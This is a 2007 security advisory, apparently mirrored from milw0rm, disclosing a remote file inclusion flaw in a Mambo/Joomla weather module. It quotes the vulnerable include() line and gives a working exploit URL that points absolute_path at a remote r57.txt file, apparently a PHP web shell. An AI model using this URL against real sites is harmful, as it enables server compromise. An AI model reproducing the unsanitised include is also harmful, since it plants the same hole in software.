Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

CreaDirectory v1.2 Remote SQL Injection Vulnerability

osp <= 1.2.1 (cfgPathToProject Admin) Remote File Include Vulnerablities

AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

StoreFront for Gallery (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities

From:	Cold Zero <c.o.1.d.0_(at)_hotmail.com>
Date:	19.04.2007
Subject:	Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln

============================================================
Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln
============================================================
Found By : Cold z3ro , Cold-z3ro@Hotmail.com
============================================================
Homepage: www.Hack-Teach.com
============================================================
Script :
http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,
a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html
============================================================
File : /mod_weather.php
include($absolute_path.'/language/'.$lang.'/lang_mod_weather.
php');
============================================================
http://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?
============================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]